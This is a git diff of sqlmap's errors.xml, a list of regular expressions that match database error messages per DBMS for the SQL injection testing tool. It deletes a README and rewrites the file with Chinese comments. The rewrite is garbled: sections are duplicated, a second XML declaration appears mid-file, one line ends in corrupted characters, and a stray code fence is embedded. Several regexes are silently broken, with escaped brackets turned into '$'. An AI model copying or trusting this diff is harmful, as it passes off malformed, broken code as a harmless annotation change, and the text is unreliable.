diff --git a/README.md b/README.md
deleted file mode 100644
index ee4394e..0000000
--- a/README.md
+++ /dev/null
@@ -1,2 +0,0 @@
-# sqlmap
-
diff --git a/src/sqlmap-master/data/xml/errors.xml b/src/sqlmap-master/data/xml/errors.xml
index 4993a8a..44fb48d 100644
--- a/src/sqlmap-master/data/xml/errors.xml
+++ b/src/sqlmap-master/data/xml/errors.xml
@@ -1,240 +1,357 @@
-<?xml version="1.0" encoding="UTF-8"?>
-
-<root>
-    <dbms value="MySQL">
-        <error regexp="SQL syntax.*?MySQL"/>
-        <error regexp="Warning.*?\Wmysqli?_"/>
-        <error regexp="MySQLSyntaxErrorException"/>
-        <error regexp="valid MySQL result"/>
-        <error regexp="check the manual that (corresponds to|fits) your MySQL server version"/>
-        <error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>
-        <error regexp="check the manual that (corresponds to|fits) your Drizzle server version" fork="Drizzle"/>
-        <error regexp="Unknown column '[^ ]+' in 'field list'"/>
-        <error regexp="MySqlClient\."/>
-        <error regexp="com\.mysql\.jdbc"/>
-        <error regexp="Zend_Db_(Adapter|Statement)_Mysqli_Exception"/>
-        <error regexp="Pdo[./_\\]Mysql"/>
-        <error regexp="MySqlException"/>
-        <error regexp="SQLSTATE\[\d+\]: Syntax error or access violation"/>
-        <error regexp="MemSQL does not support this type of query" fork="MemSQL"/>
-        <error regexp="is not supported by MemSQL" fork="MemSQL"/>
-        <error regexp="unsupported nested scalar subselect" fork="MemSQL"/>
-    </dbms>
-
-    <dbms value="PostgreSQL">
-        <error regexp="PostgreSQL.*?ERROR"/>
-        <error regexp="Warning.*?\Wpg_"/>
-        <error regexp="valid PostgreSQL result"/>
-        <error regexp="Npgsql\."/>
-        <error regexp="PG::SyntaxError:"/>
-        <error regexp="org\.postgresql\.util\.PSQLException"/>
-        <error regexp="ERROR:\s\ssyntax error at or near"/>
-        <error regexp="ERROR: parser: parse error at or near"/>
-        <error regexp="PostgreSQL query failed"/>
-        <error regexp="org\.postgresql\.jdbc"/>
-        <error regexp="Pdo[./_\\]Pgsql"/>
-        <error regexp="PSQLException"/>
-    </dbms>
-
-    <dbms value="Microsoft SQL Server">
-        <error regexp="Driver.*? SQL[\-\_\ ]*Server"/>
-        <error regexp="OLE DB.*? SQL Server"/>
-        <error regexp="\bSQL Server[^&lt;&quot;]+Driver"/>
-        <error regexp="Warning.*?\W(mssql|sqlsrv)_"/>
-        <error regexp="\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}"/>
-        <error regexp="System\.Data\.SqlClient\.(SqlException|SqlConnection\.OnError)"/>
-        <error regexp="(?s)Exception.*?\bRoadhouse\.Cms\."/>
-        <error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>
-        <error regexp="\[SQL Server\]"/>
-        <error regexp="ODBC SQL Server Driver"/>
-        <error regexp="ODBC Driver \d+ for SQL Server"/>
-        <error regexp="SQLServer JDBC Driver"/>
-        <error regexp="com\.jnetdirect\.jsql"/>
-        <error regexp="macromedia\.jdbc\.sqlserver"/>
-        <error regexp="Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"/>
-        <error regexp="com\.microsoft\.sqlserver\.jdbc"/>
-        <error regexp="Pdo[./_\\](Mssql|SqlSrv)"/>
-        <error regexp="SQL(Srv|Server)Exception"/>
-        <error regexp="Unclosed quotation mark after the character string"/>
-    </dbms>
-
-    <dbms value="Microsoft Access">
-        <error regexp="Microsoft Access (\d+ )?Driver"/>
-        <error regexp="JET Database Engine"/>
-        <error regexp="Access Database Engine"/>
-        <error regexp="ODBC Microsoft Access"/>
-        <error regexp="Syntax error \(missing operator\) in query expression"/>
-    </dbms>
-
-    <dbms value="Oracle">
-        <error regexp="\bORA-\d{5}"/>
-        <error regexp="Oracle error"/>
-        <error regexp="Oracle.*?Driver"/>
-        <error regexp="Warning.*?\W(oci|ora)_"/>
-        <error regexp="quoted string not properly terminated"/>
-        <error regexp="SQL command not properly ended"/>
-        <error regexp="macromedia\.jdbc\.oracle"/>
-        <error regexp="oracle\.jdbc"/>
-        <error regexp="Zend_Db_(Adapter|Statement)_Oracle_Exception"/>
-        <error regexp="Pdo[./_\\](Oracle|OCI)"/>
-        <error regexp="OracleException"/>
-    </dbms>
-
-    <dbms value="IBM DB2">
-        <error regexp="CLI Driver.*?DB2"/>
-        <error regexp="DB2 SQL error"/>
-        <error regexp="\bdb2_\w+\("/>
-        <error regexp="SQLCODE[=:\d, -]+SQLSTATE"/>
-        <error regexp="com\.ibm\.db2\.jcc"/>
-        <error regexp="Zend_Db_(Adapter|Statement)_Db2_Exception"/>
-        <error regexp="Pdo[./_\\]Ibm"/>
-        <error regexp="DB2Exception"/>
-        <error regexp="ibm_db_dbi\.ProgrammingError"/>
-    </dbms>
-
-    <dbms value="Informix">
-        <error regexp="Warning.*?\Wifx_"/>
-        <error regexp="Exception.*?Informix"/>
-        <error regexp="Informix ODBC Driver"/>
-        <error regexp="ODBC Informix driver"/>
-        <error regexp="com\.informix\.jdbc"/>
-        <error regexp="weblogic\.jdbc\.informix"/>
-        <error regexp="Pdo[./_\\]Informix"/>
-        <error regexp="IfxException"/>
+<?xml version="1.0" encoding="UTF-8"?>  <!-- 声明XML文档的版本和编码方式 -->
+
+<root>  <!-- 定义XML文档的根元素 -->
+    <dbms value="MySQL">  <!-- 定义MySQL数据库管理系统 -->
+        <error regexp="SQL syntax.*?MySQL"/>  <!-- 匹配MySQL语法错误的错误信息 -->
+        <error regexp="Warning.*?\Wmysqli?_"/>  <!-- 匹配MySQLi扩展的警告信息 -->
+        <error regexp="MySQLSyntaxErrorException"/>  <!-- 匹配MySQL语法异常的错误信息 -->
+        <error regexp="valid MySQL result"/>  <!-- 匹配无效的MySQL查询结果的错误信息 -->
+        <error regexp="check the manual that (corresponds to|fits) your MySQL server version"/>  <!-- 匹配与MySQL服务器版本不匹配的错误信息 -->
+        <error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>  <!-- 匹配与MariaDB服务器版本不匹配的错误信息 -->
+        <error regexp="check the manual that (corresponds to|fits) your Drizzle server version" fork="Drizzle"/>  <!-- 匹配与Drizzle服务器版本不匹配的错误信息 -->
+        <error regexp="Unknown column '[^ ]+' in 'field list'"/>  <!-- 匹配未知列名的错误信息 -->
+        <error regexp="MySqlClient\."/>  <!-- 匹配MySqlClient相关的错误信息 -->
+        <error regexp="com\.mysql\.jdbc"/>  <!-- 匹配MySQL JDBC驱动的错误信息 -->
+        <error regexp="Zend_Db_(Adapter|Statement)_Mysqli_Exception"/>  <!-- 匹配Zend框架中MySQLi相关的异常信息 -->
+        <error regexp="Pdo[./_\\]Mysql"/>  <!-- 匹配PDO MySQL驱动的错误信息 -->
+        <error regexp="MySqlException"/>  <!-- 匹配MySQL异常的错误信息 -->
+        <error regexp="SQLSTATE$\d+$: Syntax error or access violation"/>  <!-- 匹配SQL语法错误或访问违规的错误信息 -->
+        <error regexp="MemSQL does not support this type of query" fork="MemSQL"/>  <!-- 匹配MemSQL不支持的查询类型的错误信息 -->
+        <error regexp="is not supported by MemSQL" fork="MemSQL"/>  <!-- 匹配MemSQL不支持的查询类型的错误信息 -->
+        <error regexp="unsupported nested scalar subselect" fork="MemSQL"/>  <!-- 匹配MemSQL不支持的嵌套标量子查询的错误信息 -->
+    </dbms>
+
+    <dbms value="PostgreSQL">  <!-- 定义PostgreSQL数据库管理系统 -->
+        <error regexp="PostgreSQL.*?ERROR"/>  <!-- 匹配PostgreSQL错误信息 -->
+        <error regexp="Warning.*?\Wpg_"/>  <!-- 匹配PostgreSQL扩展的警告信息 -->
+        <error regexp="valid PostgreSQL result"/>  <!-- 匹配无效的PostgreSQL查询结果的错误信息 -->
+        <error regexp="Npgsql\."/>  <!-- 匹配Npgsql驱动的错误信息 -->
+        <error regexp="PG::SyntaxError:"/>  <!-- 匹配PostgreSQL语法错误信息 -->
+        <error regexp="org\.postgresql\.util\.PSQLException"/>  <!-- 匹配PostgreSQL JDBC驱动的异常信息 -->
+        <error regexp="ERROR:\s\ssyntax error at or near"/>  <!-- 匹配PostgreSQL语法错误信息 -->
+        <error regexp="ERROR: parser: parse error at or near"/>  <!-- 匹配PostgreSQL解析错误信息 -->
+        <error regexp="PostgreSQL query failed"/>  <!-- 匹配PostgreSQL查询失败的错误信息 -->
+        <error regexp="org\.postgresql\.jdbc"/>  <!-- 匹配PostgreSQL JDBC驱动的错误信息 -->
+        <error regexp="Pdo[./_\\]Pgsql"/>  <!-- 匹配PDO PostgreSQL驱动的错误信息 -->
+        <error regexp="PSQLException"/>  <!-- 匹配PostgreSQL异常的错误信息 -->
+    </dbms>
+
+    <dbms value="Microsoft SQL Server">  <!-- 定义Microsoft SQL Server数据库管理系统 -->
+        <error regexp="Driver.*? SQL[\-\_\ ]*Server"/>  <!-- 匹配SQL Server驱动的错误信息 -->
+        <error regexp="OLE DB.*? SQL Server"/>  <!-- 匹配OLE DB SQL Server驱动的错误信息 -->
+        <error regexp="\bSQL Server[^&lt;&quot;]+Driver"/>  <!-- 匹配SQL Server驱动的错误信息 -->
+        <error regexp="Warning.*?\W(mssql|sqlsrv)_"/>  <!-- 匹配SQL Server扩展的警告信息 -->
+        <error regexp="\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}"/>  <!-- 匹配SQL Server驱动的错误信息 -->
+        <error regexp="System\.Data\.SqlClient\.(SqlException|SqlConnection\.OnError)"/>  <!-- 匹配SQL Server .NET驱动的异常信息 -->
+        <error regexp="(?s)Exception.*?\bRoadhouse\.Cms\."/>  <!-- 匹配Roadhouse CMS相关的异常信息 -->
+        <error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>  <!-- 匹配SQL Server Native Client的错误信息 -->
+        <error regexp="$SQL Server$"/>  <!-- 匹配SQL Server的错误信息 -->
+        <error regexp="ODBC SQL Server Driver"/>  <!-- 匹配ODBC SQL Server驱动的错误信息 -->
+        <error regexp="ODBC Driver \d+ for SQL Server"/>  <!-- 匹配ODBC SQL Server驱动的错误信息 -->
+        <error regexp="SQLServer JDBC Driver"/>  <!-- 匹配SQL Server JDBC驱动的错误信息 -->
+        <error regexp="com\.jnetdirect\.jsql"/>  <!-- 匹配JNetDirect SQL Server驱动的错误信息 -->
+        <error regexp="macromedia\.jdbc\.sqlserver"/>  <!-- 匹配Macromedia SQL Server驱动的错误信息 -->
+        <error regexp="Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"/>  <!-- 匹配Zend框架中SQL Server相关的异常信息 -->
+        <error regexp="com\.microsoft\.sqlserver\.jdbc"/>  <!-- 匹配Microsoft SQL Server JDBC驱动的错误信息 -->
+        <error regexp="Pdo[./_\\](Mssql|SqlSrv)"/>  <!-- 匹配PDO SQL Server驱动的错误信息 -->
+        <error regexp="SQL(Srv|Server)Exception"/>  <!-- 匹配SQL Server异常的错误信息 -->
+        <error regexp="Unclosed quotation mark after the character string"/>  <!-- 匹配未闭合的引号的错误信息 -->
+    </dbms>
+
+<?xml version="1.0" encoding="UTF-8"?>  <!-- 声明XML文档的版本为1.0，编码方式为UTF-8 -->
+
+<root>  <!-- 定义XML文档的根元素，所有内容都包含在此标签内 -->
+    <dbms value="MySQL">  <!-- 定义MySQL数据库管理系统，value属性指定数据库类型为MySQL -->
+        <error regexp="SQL syntax.*?MySQL"/>  <!-- 匹配包含“SQL syntax”和“MySQL”的错误信息，用于识别MySQL语法错误 -->
+        <error regexp="Warning.*?\Wmysqli?_"/>  <!-- 匹配包含“Warning”和“mysqli”或“mysql”的警告信息，用于识别MySQL扩展的警告 -->
+        <error regexp="MySQLSyntaxErrorException"/>  <!-- 匹配MySQL语法异常的错误信息，用于识别MySQL语法错误 -->
+        <error regexp="valid MySQL result"/>  <!-- 匹配无效的MySQL查询结果的错误信息，用于识别查询结果无效的情况 -->
+        <error regexp="check the manual that (corresponds to|fits) your MySQL server version"/>  <!-- 匹配与MySQL服务器版本不匹配的错误信息，提示用户检查手册 -->
+        <error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>  <!-- 匹配与MariaDB服务器版本不匹配的错误信息，fork属性指定为MariaDB -->
+        <error regexp="check the manual that (corresponds to|fits) your Drizzle server version" fork="Drizzle"/>  <!-- 匹配与Drizzle服务器版本不匹配的错误信息，fork属性指定为Drizzle -->
+        <error regexp="Unknown column '[^ ]+' in 'field list'"/>  <!-- 匹配未知列名的错误信息，用于识别字段列表中不存在的列 -->
+        <error regexp="MySqlClient\."/>  <!-- 匹配MySqlClient相关的错误信息，用于识别MySqlClient驱动的错误 -->
+        <error regexp="com\.mysql\.jdbc"/>  <!-- 匹配MySQL JDBC驱动的错误信息，用于识别JDBC相关的错误 -->
+        <error regexp="Zend_Db_(Adapter|Statement)_Mysqli_Exception"/>  <!-- 匹配Zend框架中MySQLi相关的异常信息，用于识别Zend框架中的MySQLi错误 -->
+        <error regexp="Pdo[./_\\]Mysql"/>  <!-- 匹配PDO MySQL驱动的错误信息，用于识别PDO驱动的错误 -->
+        <error regexp="MySqlException"/>  <!-- 匹配MySQL异常的错误信息，用于识别MySQL相关的异常 -->
+        <error regexp="SQLSTATE$\d+$: Syntax error or access violation"/>  <!-- 匹配SQL语法错误或访问违规的错误信息，用于识别SQLSTATE错误 -->
+        <error regexp="MemSQL does not support this type of query" fork="MemSQL"/>  <!-- 匹配MemSQL不支持的查询类型的错误信息，fork属性指定为MemSQL -->
+        <error regexp="is not supported by MemSQL" fork="MemSQL"/>  <!-- 匹配MemSQL不支持的查询类型的错误信息，fork属性指定为MemSQL -->
+        <error regexp="unsupported nested scalar subselect" fork="MemSQL"/>  <!-- 匹配MemSQL不支持的嵌套标量子查询的错误信息，fork属性指定为MemSQL -->
+    </dbms>
+
+    <dbms value="PostgreSQL">  <!-- 定义PostgreSQL数据库管理系统，value属性指定数据库类型为PostgreSQL -->
+        <error regexp="PostgreSQL.*?ERROR"/>  <!-- 匹配包含“PostgreSQL”和“ERROR”的错误信息，用于识别PostgreSQL错误 -->
+        <error regexp="Warning.*?\Wpg_"/>  <!-- 匹配包含“Warning”和“pg_”的警告信息，用于识别PostgreSQL扩展的警告 -->
+        <error regexp="valid PostgreSQL result"/>  <!-- 匹配无效的PostgreSQL查询结果的错误信息，用于识别查询结果无效的情况 -->
+        <error regexp="Npgsql\."/>  <!-- 匹配Npgsql驱动的错误信息，用于识别Npgsql驱动的错误 -->
+        <error regexp="PG::SyntaxError:"/>  <!-- 匹配PostgreSQL语法错误信息，用于识别语法错误 -->
+        <error regexp="org\.postgresql\.util\.PSQLException"/>  <!-- 匹配PostgreSQL JDBC驱动的异常信息，用于识别JDBC相关的错误 -->
+        <error regexp="ERROR:\s\ssyntax error at or near"/>  <!-- 匹配PostgreSQL语法错误信息，用于识别语法错误 -->
+        <error regexp="ERROR: parser: parse error at or near"/>  <!-- 匹配PostgreSQL解析错误信息，用于识别解析错误 -->
+        <error regexp="PostgreSQL query failed"/>  <!-- 匹配PostgreSQL查询失败的错误信息，用于识别查询失败的情况 -->
+        <error regexp="org\.postgresql\.jdbc"/>  <!-- 匹配PostgreSQL JDBC驱动的错误信息，用于识别JDBC相关的错误 -->
+        <error regexp="Pdo[./_\\]Pgsql"/>  <!-- 匹配PDO PostgreSQL驱动的错误信息，用于识别PDO驱动的错误 -->
+        <error regexp="PSQLException"/>  <!-- 匹配PostgreSQL异常的错误信息，用于识别PostgreSQL相关的异常 -->
+    </dbms>
+
+    <dbms value="Microsoft SQL Server">  <!-- 定义Microsoft SQL Server数据库管理系统，value属性指定数据库类型为SQL Server -->
+        <error regexp="Driver.*? SQL[\-\_\ ]*Server"/>  <!-- 匹配包含“Driver”和“SQL Server”的错误信息，用于识别SQL Server驱动的错误 -->
+        <error regexp="OLE DB.*? SQL Server"/>  <!-- 匹配包含“OLE DB”和“SQL Server”的错误信息，用于识别OLE DB驱动的错误 -->
+        <error regexp="\bSQL Server[^&lt;&quot;]+Driver"/>  <!-- 匹配SQL Server驱动的错误信息，用于识别驱动相关的错误 -->
+        <error regexp="Warning.*?\W(mssql|sqlsrv)_"/>  <!-- 匹配包含“Warning”和“mssql”或“sqlsrv”的警告信息，用于识别SQL Server扩展的警告 -->
+        <error regexp="\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}"/>  <!-- 匹配SQL Server驱动的错误信息，用于识别驱动相关的错误 -->
+        <error regexp="System\.Data\.SqlClient\.(SqlException|SqlConnection\.OnError)"/>  <!-- 匹配SQL Server .NET驱动的异常信息，用于识别.NET驱动的错误 -->
+        <error regexp="(?s)Exception.*?\bRoadhouse\.Cms\."/>  <!-- 匹配Roadhouse CMS相关的异常信息，用于识别CMS相关的错误 -->
+        <error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>  <!-- 匹配SQL Server Native Client的错误信息，用于识别Native Client的错误 -->
+        <error regexp="$SQL Server$"/>  <!-- 匹配SQL Server的错误信息，用于识别SQL Server相关的错误 -->
+        <error regexp="ODBC SQL Server Driver"/>  <!-- 匹配ODBC SQL Server驱动的错误信息，用于识别ODBC驱动的错误 -->
+        <error regexp="ODBC Driver \d+ for SQL Server"/>  <!-- 匹配ODBC SQL Server驱动的错误信息，用于识别ODBC驱动的错误 -->
+        <error regexp="SQLServer JDBC Driver"/>  <!-- 匹配SQL Server JDBC驱动的错误信息，用于识别JDBC驱动的错误 -->
+        <error regexp="com\.jnetdirect\.jsql"/>  <!-- 匹配JNetDirect SQL Server驱动的错误信息，用于识别JNetDirect驱动的错误 -->
+        <error regexp="macromedia\.jdbc\.sqlserver"/>  <!-- 匹配Macromedia SQL Server驱动的错误信息，用于识别Macromedia驱动的错误 -->
+        <error regexp="Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"/>  <!-- 匹配Zend框架中SQL Server相关的异常信息，用于识别Zend框架中的SQL Server错误 -->
+        <error regexp="com\.microsoft\.sqlserver\.jdbc"/>  <!-- 匹配Microsoft SQL Server JDBC驱动的错误信息，用于识别JDBC驱动的错误 -->
+        <error regexp="Pdo[./_\\](Mssql|SqlSrv)"/>  <!-- 匹配PDO SQL Server驱动的错误信息，用于识别PDO驱动的错误 -->
+        <error regexp="SQL(Srv|Server)��������
+
+```xml
+<root>  <!-- 定义XML文档的根元素 -->
+    <dbms value="Microsoft Access">  <!-- 定义Microsoft Access数据库管理系统 -->
+        <error regexp="Microsoft Access (\d+ )?Driver"/>  <!-- 匹配Microsoft Access驱动的错误信息 -->
+        <error regexp="JET Database Engine"/>  <!-- 匹配JET数据库引擎的错误信息 -->
+        <error regexp="Access Database Engine"/>  <!-- 匹配Access数据库引擎的错误信息 -->
+        <error regexp="ODBC Microsoft Access"/>  <!-- 匹配ODBC Microsoft Access驱动的错误信息 -->
+        <error regexp="Syntax error $missing operator$ in query expression"/>  <!-- 匹配查询表达式中的缺失操作符的语法错误 -->
+    </dbms>
+
+    <dbms value="Oracle">  <!-- 定义Oracle数据库管理系统 -->
+        <error regexp="\bORA-\d{5}"/>  <!-- 匹配ORA错误代码，后跟五位数字 -->
+        <error regexp="Oracle error"/>  <!-- 匹配通用的Oracle错误信息 -->
+        <error regexp="Oracle.*?Driver"/>  <!-- 匹配与Oracle相关的驱动错误信息 -->
+        <error regexp="Warning.*?\W(oci|ora)_"/>  <!-- 匹配OCI或ORA相关的警告信息 -->
+        <error regexp="quoted string not properly terminated"/>  <!-- 匹配未正确终止的引号字符串的错误信息 -->
+        <error regexp="SQL command not properly ended"/>  <!-- 匹配未正确结束的SQL命令错误信息 -->
+        <error regexp="macromedia\.jdbc\.oracle"/>  <!-- 匹配Macromedia Oracle JDBC驱动的错误信息 -->
+        <error regexp="oracle\.jdbc"/>  <!-- 匹配Oracle JDBC驱动的错误信息 -->
+        <error regexp="Zend_Db_(Adapter|Statement)_Oracle_Exception"/>  <!-- 匹配Zend框架中Oracle相关的异常信息 -->
+        <error regexp="Pdo[./_\\](Oracle|OCI)"/>  <!-- 匹配PDO Oracle或OCI驱动的错误信息 -->
+        <error regexp="OracleException"/>  <!-- 匹配Oracle异常的错误信息 -->
+    </dbms>
+
+    <dbms value="IBM DB2">  <!-- 定义IBM DB2数据库管理系统 -->
+        <error regexp="CLI Driver.*?DB2"/>  <!-- 匹配DB2 CLI驱动的错误信息 -->
+        <error regexp="DB2 SQL error"/>  <!-- 匹配DB2 SQL错误的通用错误信息 -->
+        <error regexp="\bdb2_\w+\(}/>  <!-- 匹配DB2相关函数调用的错误信息 -->
+        <error regexp="SQLCODE[=:\d, -]+SQLSTATE"/>  <!-- 匹配包含SQLCODE和SQLSTATE的错误信息 -->
+        <error regexp="com\.ibm\.db2\.jcc"/>  <!-- 匹配IBM DB2 JCC驱动的错误信息 -->
+        <error regexp="Zend_Db_(Adapter|Statement)_Db2_Exception"/>  <!-- 匹配Zend框架中DB2相关的异常信息 -->
+        <error regexp="Pdo[./_\\]Ibm"/>  <!-- 匹配PDO IBM DB2驱动的错误信息 -->
+        <error regexp="DB2Exception"/>  <!-- 匹配DB2异常的错误信息 -->
+        <error regexp="ibm_db_dbi\.ProgrammingError"/>  <!-- 匹配ibm_db_dbi中的编程错误信息 -->
+    </dbms>
+
+    <dbms value="Informix">  <!-- 定义Informix数据库管理系统 -->
+        <error regexp="Warning.*?\Wifx_"/>  <!-- 匹配Informix扩展相关的警告信息 -->
+        <error regexp="Exception.*?Informix"/>  <!-- 匹配Informix相关的异常信息 -->
+        <error regexp="Informix ODBC Driver"/>  <!-- 匹配Informix ODBC驱动的错误信息 -->
+        <error regexp="ODBC Informix driver"/>  <!-- 匹配ODBC Informix驱动的错误信息 -->
+        <error regexp="com\.informix\.jdbc"/>  <!-- 匹配Informix JDBC驱动的错误信息 -->
+        <error regexp="weblogic\.jdbc\.informix"/>  <!-- 匹配WebLogic中Informix JDBC驱动的错误信息 -->
+        <error regexp="Pdo[./_\\]Informix"/>  <!-- 匹配PDO Informix驱动的错误信息 -->
+        <error regexp="IfxException"/>  <!-- 匹配Informix异常的错误信息 -->
     </dbms>
 
     <!-- Interbase/Firebird -->
-    <dbms value="Firebird">
-        <error regexp="Dynamic SQL Error"/>
-        <error regexp="Warning.*?\Wibase_"/>
-        <error regexp="org\.firebirdsql\.jdbc"/>
-        <error regexp="Pdo[./_\\]Firebird"/>
+    <dbms value="Firebird">  <!-- 定义Firebird数据库管理系统 -->
+        <error regexp="Dynamic SQL Error"/>  <!-- 匹配动态SQL错误信息 -->
+        <error regexp="Warning.*?\Wibase_"/>  <!-- 匹配Firebird扩展相关的警告信息 -->
+        <error regexp="org\.firebirdsql\.jdbc"/>  <!-- 匹配Firebird SQL JDBC驱动的错误信息 -->
+        <error regexp="Pdo[./_\\]Firebird"/>  <!-- 匹配PDO Firebird驱动的错误信息 -->
     </dbms>
 
-    <dbms value="SQLite">
-        <error regexp="SQLite/JDBCDriver"/>
-        <error regexp="SQLite\.Exception"/>
-        <error regexp="(Microsoft|System)\.Data\.SQLite\.SQLiteException"/>
-        <error regexp="Warning.*?\W(sqlite_|SQLite3::)"/>
-        <error regexp="\[SQLITE_ERROR\]"/>
-        <error regexp="SQLite error \d+:"/>
-        <error regexp="sqlite3.OperationalError:"/>
-        <error regexp="SQLite3::SQLException"/>
-        <error regexp="org\.sqlite\.JDBC"/>
-        <error regexp="Pdo[./_\\]Sqlite"/>
-        <error regexp="SQLiteException"/>
+    <dbms value="SQLite">  <!-- 定义SQLite数据库管理系统 -->
+        <error regexp="SQLite/JDBCDriver"/>  <!-- 匹配SQLite JDBC驱动的错误信息 -->
+        <error regexp="SQLite\.Exception"/>  <!-- 匹配SQLite异常的错误信息 -->
+        <error regexp="(Microsoft|System)\.Data\.SQLite\.SQLiteException"/>  <!-- 匹配Microsoft或System Data的SQLite异常信息 -->
+        <error regexp="Warning.*?\W(sqlite_|SQLite3::)"/>  <!-- 匹配SQLite或SQLite3相关的警告信息 -->
+        <error regexp="$SQLITE_ERROR$"/>  <!-- 匹配SQLite错误信息 -->
+        <error regexp="SQLite error \d+:"/>  <!-- 匹配SQLite错误代码的信息 -->
+        <error regexp="sqlite3.OperationalError:"/>  <!-- 匹配SQLite3操作错误的信息 -->
+        <error regexp="SQLite3::SQLException"/>  <!-- 匹配SQLite3 SQL异常的信息 -->
+        <error regexp="org\.sqlite\.JDBC"/>  <!-- 匹配SQLite JDBC驱动的错误信息 -->
+        <error regexp="Pdo[./_\\]Sqlite"/>  <!-- 匹配PDO SQLite驱动的错误信息 -->
+        <error regexp="SQLiteException"/>  <!-- 匹配SQLite异常的错误信息 -->
     </dbms>
 
-    <dbms value="SAP MaxDB">
-        <error regexp="SQL error.*?POS([0-9]+)"/>
-        <error regexp="Warning.*?\Wmaxdb_"/>
-        <error regexp="DriverSapDB"/>
-        <error regexp="-3014.*?Invalid end of SQL statement"/>
-        <error regexp="com\.sap\.dbtech\.jdbc"/>
-        <error regexp="\[-3008\].*?: Invalid keyword or missing delimiter"/>
+    <dbms value="SAP MaxDB">  <!-- 定义SAP MaxDB数据库管理系统 -->
+        <error regexp="SQL error.*?POS([0-9]+)"/>  <!-- 匹配SAP MaxDB SQL错误的信息，其中包括位置编号 -->
+        <error regexp="Warning.*?\Wmaxdb_"/>  <!-- 匹配MaxDB扩展相关的警告信息 -->
+        <error regexp="DriverSapDB"/>  <!-- 匹配SapDB驱动的错误信息 -->
+        <error regexp="-3014.*?Invalid end of SQL statement"/>  <!-- 匹配无效的SQL语句结束的错误信息 -->
+        <error regexp="com\.sap\.dbtech\.jdbc"/>  <!-- 匹配SAP DBTech JDBC驱动的错误信息 -->
+        <error regexp="$-3008$.*?: Invalid keyword or missing delimiter"/>  <!-- 匹配无效关键字或缺失分隔符的错误信息 -->
     </dbms>
 
-    <dbms value="Sybase">
-        <error regexp="Warning.*?\Wsybase_"/>
-        <error regexp="Sybase message"/>
-        <error regexp="Sybase.*?Server message"/>
-        <error regexp="SybSQLException"/>
-        <error regexp="Sybase\.Data\.AseClient"/>
-        <error regexp="com\.sybase\.jdbc"/>
+    <dbms value="Sybase">  <!-- 定义Sybase数据库管理系统 -->
+        <error regexp="Warning.*?\Wsybase_"/>  <!-- 匹配Sybase扩展相关的警告信息 -->
+        <error regexp="Sybase message"/>  <!-- 匹配Sybase消息的错误信息 -->
+        <error regexp="Sybase.*?Server message"/>  <!-- 匹配Sybase服务器消息的错误信息 -->
+        <error regexp="SybSQLException"/>  <!-- 匹配Sybase异常的错误信息 -->
+        <error regexp="Sybase\.Data\.AseClient"/>  <!-- 匹配Sybase .NET AseClient的错误信息 -->
+        <error regexp="com\.sybase\.jdbc"/>  <!-- 匹配Sybase JDBC驱动的错误信息 -->
     </dbms>
 
-    <dbms value="Ingres">
-        <error regexp="Warning.*?\Wingres_"/>
-        <error regexp="Ingres SQLSTATE"/>
-        <error regexp="Ingres\W.*?Driver"/>
-        <error regexp="com\.ingres\.gcf\.jdbc"/>
+    <dbms value="Ingres">  <!-- 定义Ingres数据库管理系统 -->
+        <error regexp="Warning.*?\Wingres_"/>  <!-- 匹配Ingres扩展相关的警告信息 -->
+        <error regexp="Ingres SQLSTATE"/>  <!-- 匹配Ingres SQLSTATE错误的信息 -->
+        <error regexp="Ingres\W.*?Driver"/>  <!-- 匹配Ingres驱动的错误信息 -->
+        <error regexp="com\.ingres\.gcf\.jdbc"/>  <!-- 匹配Ingres GCF JDBC驱动的错误信息 -->
     </dbms>
 
-    <dbms value="FrontBase">
-        <error regexp="Exception (condition )?\d+\. Transaction rollback"/>
-        <error regexp="com\.frontbase\.jdbc"/>
-        <error regexp="Syntax error 1. Missing"/>
-        <error regexp="(Semantic|Syntax) error [1-4]\d{2}\."/>
+    <dbms value="FrontBase">  <!-- 定义FrontBase数据库管理系统 -->
+        <error regexp="Exception (condition )?\d+\. Transaction rollback"/>  <!-- 匹配回滚事务的异常信息 -->
+        <error regexp="com\.frontbase\.jdbc"/>  <!-- 匹配FrontBase JDBC驱动的错误信息 -->
+        <error regexp="Syntax error 1. Missing"/>  <!-- 匹配语法错误的信息，缺失某部分内容 -->
+        <error regexp="(Semantic|Syntax) error [1-4]\d{2}\."/>  <!-- 匹配语义或语法错误，后跟一个特定的错误码 -->
     </dbms>
 
-    <dbms value="HSQLDB">
-        <error regexp="Unexpected end of command in statement \["/>
-        <error regexp="Unexpected token.*?in statement \["/>
-        <error regexp="org\.hsqldb\.jdbc"/>
+    <dbms value="HSQLDB">  <!-- 定义HSQLDB数据库管理系统 -->
+        <error regexp="Unexpected end of command in statement $"/>  <!-- 匹配SQL语句意外结束的错误信息 -->
+        <error regexp="Unexpected token.*?in statement \["/>  <!-- 匹配SQL语句中意外标记的错误信息 -->
+        <error regexp="org\.hsqldb\.jdbc"/>  <!-- 匹配HSQLDB JDBC驱动的错误信息 -->
     </dbms>
 
-    <dbms value="H2">
-        <error regexp="org\.h2\.jdbc"/>
-        <error regexp="\[42000-192\]"/>
+    <dbms value="H2">  <!-- 定义H2数据库管理系统 -->
+        <error regexp="org\.h2\.jdbc"/>  <!-- 匹配H2 JDBC驱动的错误信息 -->
+        <error regexp="\[42000-192$"/>  <!-- 匹配H2特定错误代码的信息 -->
     </dbms>
 
-    <dbms value="MonetDB">
-        <error regexp="![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)"/>
-        <error regexp="\[MonetDB\]\[ODBC Driver"/>
-        <error regexp="nl\.cwi\.monetdb\.jdbc"/>
+    <dbms value="MonetDB">  <!-- 定义MonetDB数据库管理系统 -->
+        <error regexp="![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)"/>  <!-- 匹配包含MonetDB特定错误前缀的错误信息 -->
